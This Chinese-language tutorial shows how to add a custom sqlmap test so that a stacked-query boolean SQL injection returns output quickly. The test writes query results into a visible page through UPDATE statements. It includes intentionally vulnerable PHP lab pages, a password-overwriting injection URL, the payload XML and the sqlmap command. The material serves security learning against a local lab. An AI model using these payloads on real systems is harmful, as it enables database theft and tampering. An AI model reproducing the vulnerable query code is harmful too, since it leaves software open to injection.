文中提及的部分技術(shù)可能帶有一定攻擊性，僅供安全學(xué)習(xí)和教學(xué)用途，禁止非法使用。

大家在玩SQL注入的時(shí)候大概都遇到過(guò)一種特別雞肋的情況：目標(biāo)只有支持多語(yǔ)句查詢的boolean-based注入點(diǎn)(比如CVE-2014-3704)。我們很單純地想下載數(shù)據(jù)庫(kù)，卻只能用sqlmap10線程一位一位獲取。這樣的龜速根本就是反人類!那邊跑著sqlmap這邊還不能溜掉，說(shuō)不定就要你按個(gè)“Y”。

不過(guò)，既然支持多語(yǔ)句就有另一種思路可以提速：把注入語(yǔ)句的執(zhí)行結(jié)果update到另一個(gè)可見(jiàn)頁(yè)面上，這樣就可以直接獲取注入語(yǔ)句的輸出了。然而sqlmap本身并沒(méi)有這個(gè)功能。

本文主要向讀者介紹sqlmap的payloads自定義，以及如何基于它們，利用二階注入功能，讓boolean-based注入點(diǎn)轉(zhuǎn)化成error-based，加速測(cè)試過(guò)程。

實(shí)驗(yàn)環(huán)境搭建：

實(shí)驗(yàn)用數(shù)據(jù)庫(kù)是基于sqli靶機(jī)環(huán)境的

另有兩個(gè)php分別作為上圖中的頁(yè)面一和頁(yè)面二

test.php:

<?php  
function db_connect() {  
    @ $db = new mysqli ( 'localhost', 'root', '********', 'security' );  
    // echo "out";  
    if (mysqli_connect_errno ()) {  
        echo "Error: Could not connect to database.  Please try again later.";  
        return null;  
    }  
    return $db;  
}  
$db = db_connect ();  
$id=$_GET['id'];  
$query ="SELECT * FROM users WHERE id='$id' ;";  
//echo $query;  
$result = $db->multi_query( $query );  
$result = $db->multi_query( 'select * from SLEEP(5)');  
$result = $db->store_result();  
//echo $num_results = $result->num_rows;  
echo $result->fetch_assoc()['username'];  
//echo $result->fetch_assoc ()['username'];  
$db->close ();  
?> 

test1.php

<?php  
function db_connect() {  
    @ $db = new mysqli ( 'localhost', 'root', '********', 'security' );  
    // echo "out";  
    if (mysqli_connect_errno ()) {  
        echo "Error: Could not connect to database.  Please try again later.";  
        return null;  
    }  
    return $db;  
}  
$db = db_connect ();  
$query ="SELECT * FROM users WHERE id='10' ;";  
//echo $query;  
$result = $db->query( $query );  
echo $result->fetch_assoc()['password'];  
 
$db->close ();  
?> 

顯然test.php存在支持多語(yǔ)句執(zhí)行的SQL注入漏洞

于是我們請(qǐng)求

http://127.0.0.1/sqli/test.php?id=1%27;update%20users%20set%20password%20=%20%27freebuffreebuf%27%20where%20id%20=%20%2710

就成功修改了password字段

可見(jiàn)這種思路是可行的。

Sqlmap的修改：

首先，我們先了解sqlmap是如何工作的：

sqlmap啟動(dòng)后首先設(shè)置測(cè)試的level和risk，并識(shí)別受測(cè)試元素的類型

然后從它的配置文件xml/payloads.xml里面獲取應(yīng)該測(cè)試的漏洞類型、測(cè)試方法以及相應(yīng)的漏洞利用方案

在payloads.xml里面記錄了兩類數(shù)據(jù)(如果您聽(tīng)得云里霧里的，請(qǐng)看看我翻譯的payloads.xml說(shuō)明)：

：用來(lái)使sql語(yǔ)句正確的前綴和后綴。比如前綴："'"和后綴："AND '[RANDSTR]'='[RANDSTR]"就可以閉合單引號(hào)，防止出錯(cuò)。

：特定漏洞的全部信息，包括所用到的boundary，漏洞的level、risk，漏洞類型，利用的方法，檢測(cè)方法等。

在測(cè)試一個(gè)參數(shù)的時(shí)候sqlmap會(huì)遍歷所有符合要求的test節(jié)點(diǎn)，使用request節(jié)點(diǎn)下的payload執(zhí)行漏洞掃描。

最后請(qǐng)求的內(nèi)容是(括號(hào)里只是舉例)：

原參數(shù)

（id=1）+prefix （'）+payload（AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)）+comment（注釋符這里沒(méi)有）+suffix(AND 'few'='few)

然后再用response節(jié)點(diǎn)下的某種檢測(cè)方式進(jìn)行檢測(cè)。

這里我們的思路的核心就是輸出明文，與error-based相似，因此使用error-based漏洞常使用的正則表達(dá)式進(jìn)行輸出的獲取：

<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep> 

其中[DELIMITER_START]和[DELIMITER_STOP]是用來(lái)匹配輸出開(kāi)頭和結(jié)尾的隨機(jī)生成的字符串

想必payload應(yīng)該與之對(duì)應(yīng)

<payload>;update users set password = CONCAT('[DELIMITER_START]',1,'[DELIMITER_STOP]') where id = </payload> 

這里請(qǐng)注意在error-based漏洞的檢測(cè)中sqlmap是用獲取的輸出(即在[DELIMITER_START]和[DELIMITER_STOP]之間的部分)為1來(lái)初步確定漏洞的存在的。

上述語(yǔ)句就把輸出的內(nèi)容UPDATE成了[DELIMITER_START]+"1"+[DELIMITER_STOP]使得此漏洞被檢測(cè)出存在。

檢測(cè)說(shuō)完了，說(shuō)說(shuō)利用：

利用的語(yǔ)句受vector節(jié)點(diǎn)控制，有了payload就可以對(duì)照寫出來(lái)了

<vector>;update users set password = CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') where id =</vector> 

這里的[QUERY]就是執(zhí)行的漏洞利用語(yǔ)句，輸出還是會(huì)被正則獲取

于是就有了最終的自定義test

<test>  
        <title>MySQL Customized  update query based test </title>  
        <stype>2</stype>  
        <level>1</level>  
        <risk>0</risk>  
        <clause>1</clause>  
        <where>1</where>  
        <vector>;update users set password = CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') where id =</vector>  
        <request>  
            <payload>;update users set password = CONCAT('[DELIMITER_START]',1,'[DELIMITER_STOP]') where id = </payload>  
        </request>  
        <response>  
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>  
        </response>  
        <details>  
            <dbms>MySQL</dbms>  
            <dbms_version>&gt;= 5.0.11</dbms_version>  
        </details>  
    </test> 

我們把這段代碼加入到payloads.xml里面(root節(jié)點(diǎn)里面哦)，然后基于這個(gè)自定義的測(cè)試配置和二階SQL注入，寫我們的命令：

sqlmap -u 127.0.0.1/sqli/test.php?id=1 --second-order test1.php -v 3 --level 1 --suffix "'10" 

請(qǐng)注意上述語(yǔ)句我重定義了后綴。

看看效果：

可用了!

至此，我們已經(jīng)成功讓一個(gè)慢得要死的boolean-based注入點(diǎn)進(jìn)化成為了確確實(shí)實(shí)人見(jiàn)人愛(ài)的error-based注入點(diǎn)，媽媽再也不用注入速度太慢了～

快快dump一下來(lái)體會(huì)這速度帶來(lái)的快感吧。

P.S:多次對(duì)比過(guò)程中不要忘了刪掉sqlmap的本地緩存。

參考：sqlmap源代碼

本文作者：piece of the past，聯(lián)系方式：1005308775@qq.com